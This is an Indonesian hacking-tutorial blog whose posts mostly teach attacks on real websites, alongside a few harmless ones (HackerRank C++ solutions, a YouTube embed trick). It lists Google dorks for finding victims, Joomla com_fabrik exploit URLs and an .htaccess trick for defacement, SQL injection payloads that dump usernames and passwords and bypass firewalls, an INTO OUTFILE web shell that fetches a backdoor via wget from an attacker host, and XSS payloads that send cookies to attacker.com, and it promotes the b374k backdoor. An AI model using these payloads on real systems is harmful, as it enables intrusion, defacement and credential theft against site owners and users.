skip to main | skip to sidebar

Disable CSS Anti Copy Paste

0 komentar
Apakabar sahabat no light ? Pastinya kalian sebel kalau kalian saat ngerjakan tugas dan nemu artikel bagus, tapi eh ketika artikelnya mau di copy paste tidak bisa. Di tutorial kali ini saya akan membagikan sebuah cara untuk mendisable CSS yang digunakan untuk mendisable copy paste artikel.


Ikuti langkah langkah berikut, di tutorial ini saya menggunakan browser firefox yang support dengan Style Editor :

1) Masuk ke Inspect Qlement dengan menekan tombol F12 pada keyboard.

2) Masuk ke tab {} Style Editor.

3) Tunggu browser menampilkan semua CSS nya, klik tanda + untuk menambahkan CSS.


4) Masukan kode CSS berikut :

* {
   -khtml-user-select: text;
   -webkit-user-select: text;
   -moz-user-select: text;
   -ms-user-select: text;
   -o-user-select: text;
    user-select: text;
    unselectable: off;
}

5) Sip, tinggal copas artikel yang kalian butuhkan.

Tapi jika kalian ingin meng-copy artikel yang lain, kalian harus tetap lakukan cara seperti diatas. Jika tidak berhasil kemungkinan proteksi copy pastenya menggunakan Javascript yang akan saya bahas pada tutorial berikutnya.

Sampai jumpa dan semoga bermanfaat.

Kasus XSS - Tag HTML di Blok

0 komentar
Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi setiap tag HTML yang saya masukan selalu di hapus. Tetapi pada kasus ini nilai dari parameter ter-reflected ke tag input. Di tutorial ini saya tidak mencontohkan pada website.


Untuk website yang mempunyai filter seperti ini sangat jarang sekali. Semisal url websitenya seperti ini :

URL : website-ru.sak/search?q=zerobyte

Jika kita melihat pada kode html nya nilai dari parameter "q" ter reflected pada tag input

<input type="text" name="p" value="zerobyte">

Kalau kita memasukan payload seperti pada tutorial berikutnya Mencuri Cookie dengan XSS. Maka tag HTML apapun akan di hapus atau tidak ditampilkan. Karena petik ganda tidak di filter, kita dapat memakai payload seperti dibawah ini :

Payload: " autofocus onfocus="javascript:alert(1)

Sehingga jika payload dimasukan ke kode HTML akan menjadi seperti ini :

<input type="text" name="p" value="" autofocus onfocus="javascript:alert(1)">

Atribut autofocus pada tag input akan membuat inputan tersebut focus ( seperti saat user klik/akan mengisi inputan tersebut ), karena atribut tersebut focus kita dapat memberikan kode javascript yang di handle oleh event onfocus, dimana ketika tag input dalam kondisi focus, kode javascript akan dijalankan.

Maaf jika tidak banyak yang bisa saya sampaikan, sampai jumpa pada tutorial berikutnya.

Plus Minus ( C++ ) - Hacker Rank

0 komentar
Masih dengan hacker rank. Di materi kali ini kita akan menyelesaikan persoalan tentang Plus Minus. Permasalahannya adalah kita harus menghitung rasio atau proporsi dari jumlah bilangan positf, bilangan negatif dan bilangan 0.


Cara menyelesaikannya cukup simple saja, disini saya akan menggunakan bahasa pemrograman C++. Kalian bisa tulis di kolom komentar jika meng-inginkan bahasa pemrograman lain.

Kasus : Plus Minus

Permasalahannya seperti ini jadi semisal ada array : [-4, 3, -9, 0, 4, 1]
Kita harus menemukan berapa banyak nilai negatif, positif dan nol. Lalu masing masing dibagi dengan jumlah nilai pada array. Semisal, jumlah nilai positif 3, negatif ada 2, nol sebanyak 1.

Berarti :
3/6 = 0.50000
2/6 = 0.33333
1/6 = 0.16667

Lalu kita tampilkan masing-masing hasilnya. Untuk menyelesaikannya kita perlu :
1) Perulangan untuk mengambil tiap nilai pada array
2) Variabel untuk mengampung jumlah nilai positif, negatif dan nol.
3) Mencari banyak data, dengan menggunakan size().
4) Percabangan IF untuk mengecek setiap nilai apakah nilai positif, negatif atau nol.

Kode programnya seperti ini :
void plusMinus(vector<int> arr) {
    int i, jumlahP = 0, jumlahN = 0, jumlah0 = 0;
    int arraySize = arr.size();
    for(i = 0; i < arraySize; i++) {
        // Jika Nilai Positif
        if(arr[i] > 0) {
            jumlahP += 1;
        }
        // Jika Nilai Negatif
        else if(arr[i] < 0) {
            jumlahN += 1;

        }
        // Nilai Nol
        else {
            jumlah0 += 1;
        }
    }
    cout << (float)jumlahP / (float)arraySize <<"\n";
    cout << (float)jumlahN / (float)arraySize <<"\n";
    cout << (float)jumlah0 / (float)arraySize;
}

Sukses, semoga permanfaat.

Simple Array Sum ( C++ ) - Hacker Rank

0 komentar
Untuk tutorial kali ini saya akan membahas tentang pemrograman yang mana saya akan menunjukan cara untuk menyelesaikan sebuah permasalahan pemrograman. Jadi nantinya akan ada banyak challenge pemrograman dari yang mudah sampai yang sulit. Jadi challenge pemrograman ini dari website Hacker Rank. Kalian dapat mengunjungi wesite Hacker Rank. Tetapi website ini berbahasa inggris jika kalian ingin menjadi programmer kalian harus mempelajari bahasa inggris.


Oke, langsung mulai saja, saya akan menggunakan bahasa C++ untuk menyelesaikan kasus ini. Kasusnya adalah simple array sum, yang mana kita harus menjumlahkan setiap nilai pada array yang diberikan. Disini saya tidak akan mengajarkan dasar dari pemrograman.

Kasus : Simple Array Sum

Nama variable dari array nya adalah "ar" yang berada para parameter fungsi "simpleArraySum". Yang kita perlukan diantaranya :
1) Perulangan, kita perlu cara untuk mengambil nilai dari setiap array mulai dari array 0 - terakhir
2) Jumlah panjang array, panjang array maksudnya adalah jumlah bilangan yang berada pada array. Kita bisa memakai fungsi size().
3) Mengambil nilai array, dengan namaArray[index].


Kode programnya seperti ini :

int simpleArraySum(vector<int> ar) {
    int i, jumlah = 0;
    for(i = 0; i < ar.size(); i++) {
        jumlah += ar[i];
    }
    return jumlah;
}

Sukses, kasus berhasil terselesaikan. Semoga bermanfaat dan selamat ngoding.

Buku Sakti Hacker - PDF 350 Halaman

0 komentar
Kali ini saya hanya akan membagikan sebuah buku tentang hacking. Materi yang didalamnya sangat banyak seperti sniffing, phishing, backdoor, dos attack, port scanning dll. Di kebanyakan website memang sudah membagikan buku ini, tetapi tidak lengkap. Di buku ini saya sudah melengkapi halaman-halaman yang kurang.


Kalian bisa download di link ini, kalian sudah tidak perlu memasukan password lagi, tinggal pakai saja :D Tapi di buku ini akan saya bahas ulang di blog ini.


Download :
LINK !!!

Semoga bermanfaat jika ada halaman yang kurang setiap ganti ke materi selanjutnya. Itu adalah halaman awal dari setiap materi. Jangan khawatir halaman itu tidak terlalu penting.

Embed Video - Nonton YT Tanpa Iklan dan Tampilan Semi-Full

0 komentar
Di tutorial ini saya akan mebagikan sebuah cara unik untuk menonton video youtube tanpa menampilkan iklanm yaitu dengan fitur embed video dari youtube itu sendiri. Fitur embed pada youtube biasanya digunakan untuk menyisipkan video-video pada blog atau website, yang mana kita dapat memutarnya secara langsung tanpa mengunjungi halaman youtube.


Dan ini berlaku untuk yang menggunakan browser. So, caranya cukup simple. Kalian kunjungi youtube seperti biasanya dan buka videonya. Semisal URL videonya seperti ini :

URL : https://www.youtube.com/watch?v=3Kq1MIfTWCE

Kalian ganti URL nya menjadi seperti ini.

URL : https://www.youtube.com/embed/3Kq1MIfTWCE

Kalau kalian kunjungi URL tersebut kalian akan membuka video youtube dengan tampilan semi-full seperti di bawah ini. Kalian juga tetap bisa mengatur resolusi, subtitle dan kecepatannya.


Semoga bermanfaat dan sampai jumpa.

B374K Shell Backdoor - PHP

0 komentar
Kali ini saya tidak membahas tehnik-tehnik haking, melainkan saya akan membagikan kepada kalian shell backdoor yang sering saya gunakan. Menurut saya shell backdoor ini adalah shell backdoor terbaik dari shell backdoor lain yang beredar di internet.


Shell backdoor terbaik yaitu b374k versi 3.2.3 :

B374K Versi 3.2.3
B374K yang dapat dibaca bejak atau becak adalah shell backdoor yang menurut saya paling populer, shell ini pembuatnya adalah orang Indonesia. B374K memiliki banyak fitur. Untuk mengakses shell ini kalian harus memasukan password, password nya adalah "b374k".


Fitur yang paling membuat saya berkesan diantaranya :
A. Di bar paling atas kita dapat masuk ke disk drive manapun, pada gambar di atas terdapat drive C, E, J, dan O.

B. Di fitur Explorer terdapat action diantaranya: compress dan extract file Zip, copy-paste-delete, dan action untuk mengganti permission sebuah file atau folder.

C. Server Info, di fitur ini dapat mengetahui informasi drive dan informasi PHP secara lengkap.

D. Network, di fitur ini ada 3 hal yang dapat kita lakukan yaitu Bind Shell, Reverse Shell, Simple Packet Crafter

E. Processes, di fitur ini menurut saya unik yaitu bisa menampilkan proses apa saja yang berjalan yang menyerupai task manager pada windows, kita juga bisa menutup ( kill ) proses tersebut.

Mengapa shell ini saya katakan terbaik ?
- Shell ini memiliki banyak fitur dari shell backdoor yang lain.
- UI lebih user friendly karena enak di pandang
- Memiliki ukurang yang kecil, meskipun memiliki banyak fitur yang untuk tetapi untuk ukuran file juga tidak besar hanya berukurang sekitar 200kb.

Tetapi selain shell b374k ada shell lain yang bernama WSO, tampilan dan fiturnya juga bagus tetapi karena versi PHP yang saya gunakan adalah versi 7 saya tidak bisa membuka shell WSO karena ada satu function yang sudah tidak bisa dijalankan lagi di PHP versi 7.

Download B374K :
LINK !!!

Oke, segitu saja dari saya. Semoga bermanfaat dan sampai jumpa pada materi berikutnya.

Deface Website CMS Joomla ( Import CSV )

0 komentar
Halo gengs apakabar ? kali ini saya akan membagikan tutorial deface website yang menggunakan CMS Joomla. Trik deface ini memanfaatkan sebuah halaman untuk upload file CSV. File CSV sendiri adalah sebuah dokumen table yang mirip dengan document excel tetapi lebih ringkas dan sederhana. Namun pada saat upload file, tidak hanya file dengan format CSV saja yang dapat di upload melainkan file seperti Image, HTML dan PHP juga dapat di upload.


Seperti biasa disini saya akan menyensor sepenuhnya website-website yang saya tunjukan disini, karena website ini memiliki disclaimer yang mana hanya untuk tujuan pembelajaran saja, untuk targetnya kalian dapat mencarinya dengan dork berikut ini :

inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:ru
inurl:viewTable?cid= site:ac
inurl:viewTable?cid= site:id
inurl:viewTable?cid= site:my
inurl:viewTable?cid= site:co

Jika pencarian website nya cukup susah kalian bisa hilangkan site dan titik ganda setelah inurl.  Website yang menjadi target ciri-ciri URL nya seperti ini :

URL-1 : website-ru.sak/index.php?option=com_fabrik&task=viewTable&cid=9


URL-2 : https://rusakin.aja/component/fabrik/viewTable?cid=


Jika dilihat dari tampilan kedua website diatas dapat dilihat bahwa halaman menampilkan tulisan "Sorry this form..." berarti website tersebut dapat di beri exploit, gunakan exploit dibawah ini :

Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Setelah di exploit nantinya website akan menampilkan sebuah halaman form Import CSV. Lalu pilih file dan klik tombol upload.


Secara umum file akan berada pada folder media jadi buka file dengan URL seperti ini, jika file tidak ada atau tidak dapat dibuka berarti CMS tersebut sudah di patch atau di tambal celahnya :

URL : alamat-website.com/media/nama-file.html

Happy hacking dan sampai jumpa pada tutorial berikutnya.


Tulis di kolom komentar jika belum ada yang kalian pahami.

Kasus XSS - Reflected XSS pada Kode Javascript

0 komentar
Apakabar sahabat No Light ? Di tutorial ini akan saya bahas tentang kasus XSS yang pernah saya temui. Jadi website yang saya test kerentanannya ini memiliki celah XSS yang mana parameter URL ter-reflected pada kode Javascript. Untuk tutorial ini saya akan mencoba pada website local.


Jika kita lihat pada tampilan websitenya tidak ada reflected apapun. Tetapi bila kita lihat melalui inspect element kita dapat melihat bahwa nilai dari parameter ter-reflected kedalamnya.


Karena ter-reflected kedalam sebuah string kita dapat mengexploitasinya dengan mudah. Ada 2 cara yang dapat dilakukan yang pastinya jika kondisinya berbeda.

1) Jika TAG html tidak terfilter termasuk tag script, kita dapat menggunakan payload

Payload: </script><script>alert(1)</script>

Ganti alert(1) dengan kode javascript kalian. Jika menggunakan payload diatas kita website akan menampikan dialog alert.

2) Jika TAG html difilter kita dapat menggunakan payload seperti ini, alert() akan memunculkan sebuah dialog dengan tulisan tertentu.

Payload: "-alert(1)-"

atau jika kalian ingin target langsung mengunjungi website tertentu, gunakan kode javascript location replace

Payload: "-window.location.replace("https://google.com")-"

Oke, itu saja untuk tutorial kali ini dan maaf jika tidak banyak yang bisa saya terangkan pada tutorial ini semoga bermanfaat dan sampai jumpa pada tutorial berikutnya.

Pencurian Identitas Pengguna

0 komentar
Di materi kali ini saya tidak membahas tentang tehnik-tehnik hacking seperti sebelumnya. Disini saya akan membahas secara teori cara-cara untuk mendapatkan sebuah informasi dari user atau pengguna. Saya tidak akan membahas terlalu banyak dan bertele-tele, saya akan menjelaskan poin pentingnya saja.


Sumber informasi di dunia ini sangatlah banyak. Informasi yang bisa didapatkan antara lain Kartu Kredit, SIM ( Surat Ijin Mengemudi ), KTP, KK, Passport, Nama, Alamat, Nomor Telephone, Kartu Identitas, Buku Tabungan, dll. Lalu bagaimana seorang penyerang dapat menemukan informasi tersebut ? Ada beberapa cara untuk mendapatkan informasi penting diatas :

1) Phishing
Mungkin bagi kalian sudah tidak asing lagi dengan kata phishing, phishing secara umum dikenal dengan website palsu yang mana akan memperdayai korban sehingga korban tanpa sadar akan memberikan informasinya sendiri.

2) Social Engineering
Sosial Engineering dikenal dengan sebuah seni untuk memanipulasi manusia secara emosional untuk mendapatkan informasi sensitif. Dalam melakukan ini kita harus pintar dalam bicara dan pintar mengelabuhi korban.

3) Hacking
Hacking berarti sebuah aksi untuk meretas sistem yang digunakan korban. Sistem yang dapat diretas diantaranya website, komputer dan HP / Smart Phone. Tehnik hacking sendiri bermacam-macam, seperti SQLi, CSRF, MITM dll.

4) Pencurian Data Pribadi
Pencurian informasi seperti SIM, KTP, Kartu Kredit atau informasi sensitif lainnya dapat didapatkan melalui HP / Smart Phone, dompet dan jika kalian pernah menonton film "Who Am I" informasi didapatkan melalui sampah.


Apa yang dapat dilakukan dengan informasi diatas ? Bagi seorang hacker informasi secuil kertas pun sangat berguna, informasi yang sangat kecil bisa menjadi informasi yang besar dan berguna.

1) Pencurian dalam Bentuk Keuangan
Pencurian dalam bentuk keuangan biasanya terjadi pada kartu kredit, kartu kredit dapat mudah di duplikasi dan mudah untuk dibawa kemanapun.

2) Pemalsuan Perseorangan / Perusahaan
Dengan informasi seperti identitas diri atau perusahaan, hacker dapat dengan mudah berpura-pura sebagai seseorang dan / atau mengatasnamakan perusahaan tertentu untuk mengelabuhi target.

3) Penjualan Data
Beberapa hari / bulan yang lalu terdapat kasus penjualan data penduduk secara ilegal. Data informasi dari penduduk harganya juga cukup tinggi tergantung dari kelengkapan dan kesensitifan data.

4) Pembocoran Informasi
Biasanya informasi atau dokumen perusahaan atau pemerintah yang bocor dan tersebar di media sosial dikarenakan karena kegiatan di atas.


Lalu bagaimana mengatasi pencurian informasi penting. Ada beberapa hal yang dapat dilakukan, diantaranya :

1) Jangan sembarangan meletakkan atau membuang informasi penting.

2) Jika kartu kredit atau kartu ATM hilang, dapat menghubungi pihak bank untuk menonaktifkannya.

3) Untuk sebuah website, dapat ditingkatkan keamanannya dengan cara maintenance rutin.

4) Teliti dalam menampilkan informasi dari sebuah akun di media sosial. Hindari untuk mempublish informasi sensitif.

5) Hindari website-website yang kurang terpercaya.


Saya harap informasi diatas dapat bermanfaat. Jika ada yang ditanyakan silahkan tulis di kolom komentar. Sekian dari saya dan sampai jumpa pada materi berikutnya.

Deface Website Joomla ( Ajax Upload )

0 komentar
Halo sahabat No Light, di tutorial ini saya akan menjelaskan sebuah cara untuk mendeface website yang menggunakan CMS Joomla. Deface dengan cara ini juga dapat mengganti tampilan halaman home dari sebuah website, mungkin lebih banyak dikenal dengan sebutan tebas index, yang mana file yang kita upload ke server adalah file htaccess.


Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com

Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Sehingga URL nya menjadi seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.


Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :

DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

CSRF Com_Fabrik File Uploader

Target :


File :

Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :

{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}

Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.

Mengganti MAC Address dengan TMAC Changer

0 komentar
Di tutorial kali ini saya akan menunjukan sebuah cara untuk mengganti MAC Address komputer, namun tidak sepenuhnya mengganti MAC Address-nya. MAC Address komputer hanya akan di masking atau ditutup dengan MAC Address yang paslu. Untuk toolsnya dapat kalian download di website ini TMAC Changer.


Ikuti langkah-langkah berikut untuk mengganti MAC Addressnya :
1) Pilih "Network Connection" semisal untuk Wireless Network Connection yang mana itu adalah koneksi Wi-Fi.

2) Ada 2 cara yang dapat lakukan untuk mengganti MAC nya :
- Pertama kalian dapat menuliskan sendiri MAC Addressnya.
- Kedua, dapat menggunakan MAC Address yang disediakan

3) Klik "Change Now!" untuk menerapkan MAC Address.

4) Jika ada peringatan / error, centang "use 02 as first octet..".


Untuk memastikan apakah MAC Address benar-benar berganti, kalian bisa cek melalui CMD dengan menggunakan perintah :

ipconfig /all



Semoga tutorial ini bermanfaat dan tulis dikolom komentar jika ada yang tidak dipahami. Dan sampai jumpa pada tutorial berikutnya.

Mem-Bypass WAF SQLi ( Not Acceptable )

0 komentar
Kali ini saya akan membahas sebuah cara untuk membypass WAF SQLi. WAF bekerja ketika kita mencoba untuk meng-injeksi query SQL dan website memunculkan halaman "403 Forbidden" atau "406 Not Acceptable". WAF adalah Web Application FireWall. WAF akan mengecek setiap inputan yang dilakukan oleh pengguna. Di tutorial ini saya akan membahasnya secara singkat.


Tampilan error 403 dan 406 seperti berikut, tetapi nama websitenya saya ganti ( sensor ) karena saya tidak ingin menunjukan kerentanan website atau aplikasi yang belum di patch.



Caranya cukup gampang kalian tinggal tambahkan query menjadi /*!query*/. Saya tunjukan sebagian contohnya, untuk yang lain bisa kalian coba-coba sendiri.

and -- /*!and*/
1=1 -- /*!1=1*/
union -- /*!union*/
select 1,2,3.. -- /*!select 1,2,3,4,5...*/ atau /*!select*/ 1,2,3,4,5...
order by 1 -- /*!order by 1*/

Jika cara diatas tidak bisa kalian dapat tambahkan angka setelah tanda seru "!".

union -- /*!5000union*/
and -- /*!123and*/
union select 1,2,3... -- /*!12union*/ /*!34select*/ 1,2,3,...

Untuk tehnik bypass WAF yang lain dan lebih banyak kalian dapat mengunjungi halaman ini SQLi Bypassing WAF. Oke itu saja untuk tutorial kali ini semoga bermanfaat dan Happy Hacking. Sampai jumpa pada tutorial berikutnya.

Stored XSS sampai Deface Halaman Website

0 komentar
Jika kalian sudah mempelajari tentang XSS, di tutorial kali ini saya akan menunjukan salah satu dampak yang dapat ditimbulkan dari serangan XSS yaitu Defacing. Deface yaitu mengubah tampilan dari sebuah website. Di tutorial ini saya akan menguji pada website local.


Di website ada sebuah kolom komentar, yang mana kita dapat memasukan nama dan sebuah komentar.


Untuk stored XSS, kode XSS akan disimpan didalam database. Jadi untuk stored XSS bersifat permanen, tidak seperti reflected XSS yang dapat terjadi jika user mengunjungi link yang ada payload XSS nya.

Jika kita memasukan payload dibawah ini pada kolom komentar kita akan mendapatkan kotak dialog alert. Siapapun yang mengunjungi link tersebut akan melihat sebuah kotak dialog.

Payload : <img src='x' onerror='alert(1)'>

Bagaimana jika payload nya seperti ini :

Payload : <script>document.documentElement.innerHTML = "<body style='background:black;color:white;'><h1>Your Website Has Been Hacked</h1></body>"</script>

*document.documentElement.innerHTML untuk mengubah kode HTML yang ditampilkan di website.

Hasilnya seperti ini, website sudah berhasil di deface dengan metode Stored XSS.


Tehniknya sangat sederhana namun dampaknya sangat besar. Segitu saja untuk tutorial kali ini semoga bermanfaat, silahkan bertanya di kolom komentar jika ada yang kurang dimengerti. Sampai jumpa pada tutorial berikutnya.

Pack dan Unpack Kode Javascript

0 komentar
Apa kabar sahabat No Light ? pernahkah kalian melihat kode javacript pada template blogger yang cukup susah untuk dibaca ? Nah untuk kali ini saya akan membahas sebuah kode javascript yang dapat di pack sehingga sulit untuk dibaca alurnya. Biasanya kode javascript yang di pack ditandai dengan sebuah fungsi dengan parameter "p,a,c,k,e,d".


Di tutorial kali ini saya akan menunjukan langkah-langkah untuk mem-pack kode javascript dan meng-unpack. Sebelum itu saya akan menunjukan contoh kode javascript yang sudah di pack.


Untuk meng-unpack kode diatas kita akan menggunakan tool pack-unpack buatan Dean Edwards. Kalian dapat mengunjungi website UNPACKER. Ikuti langkah berikut :
1) Copy kode javascriptnya


2) Paste pada kolom paste dan klik unpack.


Untuk mem-pack kode javascript kita masih akan memakai tool dari Dean Edwards. Kunjungi PACKER. Ikuti langkah berikut :
1) Copy kode javascriptnya


2) Paste kode javascriptnya di kolom Paste. Centang "base62 encode". Klik tombol Pack


Mudah bukan ? oke, segitu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada tutorial berikutnya.

Mencuri Cookie Pengguna dengan XSS

0 komentar
Cookie yang dibahas disini bukan kue. Cookie adalah sebuah informasi yang digunakan website untuk menyimpan informasi data pengguna. Data login tersebut difungsikan akan jika pengguna ingin membuka website tersebut tidak perlu login lagi.


Kita dapat mencuri cookie dari pengguna dengan menggunakan tehnik XSS atau Cross Site Scripting. Cross Site Scripting sama seperti SQLi yaitu berupa injeksi kode, tetapi untuk XSS menggunakan kode HTML dan Javascript. Kerentanan terhadap XSS terbanyak pada fitur pencarian yang ada di website.

Syarat :
1) Memahami HTML
2) Memahami Javascript

XSS sendiri terbagi menjadi 2 yaitu :
1) Reflected XSS, payload berada pada parameter url.
2) Stored XSS, payload disimpan di database.

Untuk contoh targetnya kalian bisa cari sendiri, saya menggunakan server lokal. Saya akan mencontohkan untuk men-eksploitasi pada fitur pencarian. Biasa ketika kita mencari sesuatu maka url akan berubah dan membawa parameter tertentu.


Dari gambar diatas dapat dilihat kalau nilai dari parameter "j" ( pada URL ) mempunyai nilai berita dan nilai tersebut ter-reflected ke dalam sebuah tag html dan kolom input. Kita masukan payload untuk mengecek kerentanan website.

Payload : "><img src=x>
URL : .../xss_1.php?j="><img src=x>

Jika website menampilkan gambar dengan icon rusak, berarti website tersebut rentan terhadap XSS. Setelah itu kita coba untuk menampilkan cookie user dengan fungsi javascript alert() dan document.cookie.


Payload : "><img src=x onerror="javascript:alert(document.cookie)">
URL : .../xss_1.php?j="><img src=x onerror="javascript:alert(document.cookie)">

Contoh cookie yang ditampilkan di website seperti ini :


Setelah itu kita buat payload untuk menyimpan cookie ( yang didapatkan ) ke website kita sendiri. Kita gunakan tag script untuk menjalankan kode javascript dengan mudah.

Payload : "><script>window.location='http://attacker.com%3fparam='%2bencodeURI( document.cookie )</script>

Ganti website attacker dan parameternya dengan kepunyaan kalian sendiri. Kalau url-nya dikunjungi, akan langsung dialihkan ke halaman attacker.


Oke, segitu saja untuk kali ini. Untuk yang stored XSS secara tehnik sama saja. Tulis dikolom komentar jika kalian belum paham dan sampai jumpa pada tutorial berikutnya.

Upload File dengan SQL Injection

0 komentar
Apakabar semuanya ? Baik-baik saja kan ? Untuk file upload dengan metode SQL Injection ini sangat jarang, karena kita memerlukan user yang bertindak sebagai Root atau user yang memiliki akses read dan write file. Sebelumnya sudah saya bahas untuk SQL Injection di halaman berikut SQL Injection.


Setelah kalian memahami penggunaan SQL Injection, kita akan memperluasnya sampai mengupload sebuah file. Informasi yang harus diketahui adalah direktori dari sebuah website, direktori website dapat kita ambil dengan berbagai cara salah satu contoh dengan error saat mengecek kerentanan terhadap SQL Injection, seperti berikut :


Jadi kita dapat mengupload filenya pada /nfc/c05/h02/mnt/83231/domains/webrusak.com/html/namafile.php. Untuk mengupload filenya kita memanfaatkan fungsi SQL yaitu into outfile. Kita tambahkan kode PHP pada payload SQLi :

<?php system($_GET[cmd]);?>

sehingga url menjadi seperti ini :

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,'<?php system($_GET[cmd]);?>',5 into outfile "/nfc/c05/h02/mnt/83231/domains/webrusak.com/html/small-cmd.php"-- -

Kita buka file tadi pada :
https://namawebsite.com/small-cmd.php?cmd=

Jika filenya dapat dibuka berarti websitenya rentan. Kalian bisa isi nilai dari parameter cmd dengan perintah wget untuk upload shell semisal :

URL : https://namawebsite.com/small-cmd.php?cmd=wget+http://webattacker.com/shells/php/shell.txt

Oke, setelah itu kita rename shell.txt menjadi shell.php dengan perintah mv atau dapat disebut move.

URL : https://namawebsite.com/small-cmd.php?cmd=mv+shell.txt+shell.php

Terakhir, karena shell sudah terupload ke server kita dapat membukanya secara langsung dan kita sudah berhasil menguasai website.

https://namawebsite.com/shell.php

*Shell tersebut biasa dinamakan dengan Backdoor ( pintu belakang ) maksudnya adalah sebuah file / aplikasi yang digunakan untuk mengakses sistem tanpa menjadi admin ( akses secara ilegal )

Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai sumpa pada tutorial berikutnya. Silahkan untuk bertanya pada kolom komentar jika ada yang kurang dimengerti.

Mengambil Alih Database Website dengan SQLi

0 komentar
Halo sahabat No Light, bagaimana kabarnya ? kali ini saya akan membagikan tutorial mengenai SQL Injection. Di tutorial sebelumnya kita sudah belajar untuk membypass akses login dengan SQLi, nah sekarang kita akan menggunakan tehnik tersebut untuk mengambil alih ( takeover ) database sebuah website. Seperti biasa saya tidak akan menjelaskan terlalu banyak, hanya poin pentingnya saja dan kalian harus mencobanya sendiri.


Untuk target website yang memiliki kerentanan terhadap SQLi kalian dapat menemukannya dengan menggunakan google dork, masukan kata kunci dibawah ini pada kolom pencarian google :

inurl: id=

Kalian ambil contoh semisal pada website, dengan alamat :

https://webrusak.com/berita.php?id=10

Jadi disini kita akan memasukan payload SQLi pada parameter "id" yang ada pada URL. Ikuti langkah berikut :
1) Cek kerentanan dengan menambahkan tanda petik pada nilai parameter.

URL : https://webrusak.com/berita.php?id=10'

2) Jika website menampilkan error atau hanya blank ( kosong ), berarti website tersebut memiliki kerentanan.


Lalu cek lagi dengan menambahkan and 1=1 -- - sehingga

URL : https://webrusak.com/berita.php?id=10' and 1=1 -- -

Jika error, hilangkan petiknya

URL : https://webrusak.com/berita.php?id=10 and 1=1 -- -

Jika website menampilkan halaman normal ganti and 1=1 dengan and 1=0 jika website tidak error dan menampilkan halaman kosong ( blank ) berarti dapat dipastikan website tersebut rentan. Setelah itu kita cari banyak kolom website dengan order by kolom. Pertama kita masukan kolom 99.

URL : https://webrusak.com/berita.php?id=10 and 1=0 order by 99 -- -

Jika error kurangi kolom menjadi 20.
- Kurangi denga 1 jika masih error, dan sampai tidak error ( berarti itu adalah jumlah kolom nya )
- Tambah dengan 1 jika tidak error, dan sampai error ( berarti jumlah kolom adalah kolom yang sebelum error )
Saya harap dapat di pahami.

Setelah itu kita gunakan union select untuk menambahkan record yang diambil dari database. Ilustrasinya seperti ini :


Tabel atas adalah data / record yang diambil dari database, Tabel bawah adalah data yang dimasukan lewat union select. Kita masukan banyak kolom sesuai dengan kolom yang sudah ditemukan dengan menggunakan order by tadi, Payload seperti ini ( semisal jumlah kolomnya 5 ) :

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,4,5 -- -

Semisal kita mendapatkan tampilan ini :


Kita tampilkan informasi yang kita inginkan pada kolom dengan nomor seperti diatas. Semisal mendapatkan nama database, dengan perintah database().

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,database(),5 -- -

Mendapatkan informasi user dan versi yang digunakan server.

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,user(),5 -- -
URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,@@version,5 -- -

Mendapatkan tabel yang ada pada database.

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,group_concat(table_name, ','),5 from information_schema.tables -- -

Mengambil nama kolom dari tabel tertentu. Semisal nama tabelnya "member".

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,group_concat(column_name, '|'),5 from information_schema.columns where table_name = 'member' -- -

Melihat isi / record dari sebuah tabel. Semisal kita sudah mendapatkan nama kolomnya "username" dan "password".

URL : https://webrusak.com/berita.php?id=10 and 1=0 union select 1,2,3,group_concat(username, '-', password,'|'),5 from member -- -

Itu saja untuk kali ini semoga dapat dipahami dan bermanfaat. Jika ada kebingungan silahkan tulis di kolom komentar, sampai jumpa pada tutorial berikutnya.

Bypass Halaman Login dengan SQLi

0 komentar
Halo sahabat No Light, di postingan pertama ini saya akan membagikan tutorial tentang SQL Injection. Tehnik SQLi pada tutorial ini akan digunakan untuk membypass akses login dari sebuah website. Jadi di postingan ini dan postingan kedepannya saya hanya akan membahasnya secara sederhana dan simple saja.


Untuk mencari website yang memiliki halaman login terutama admin dapat kalian cari dengan dork  berikut :

inurl:login[4"admin"] site:
inurl:admin ["Userlogin"]**site:
inurl:/admin.php intext:login intext:adminsitrator intext:username
inurl:/admin/index.php
inurl :/admin/Admin.php intext:login inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
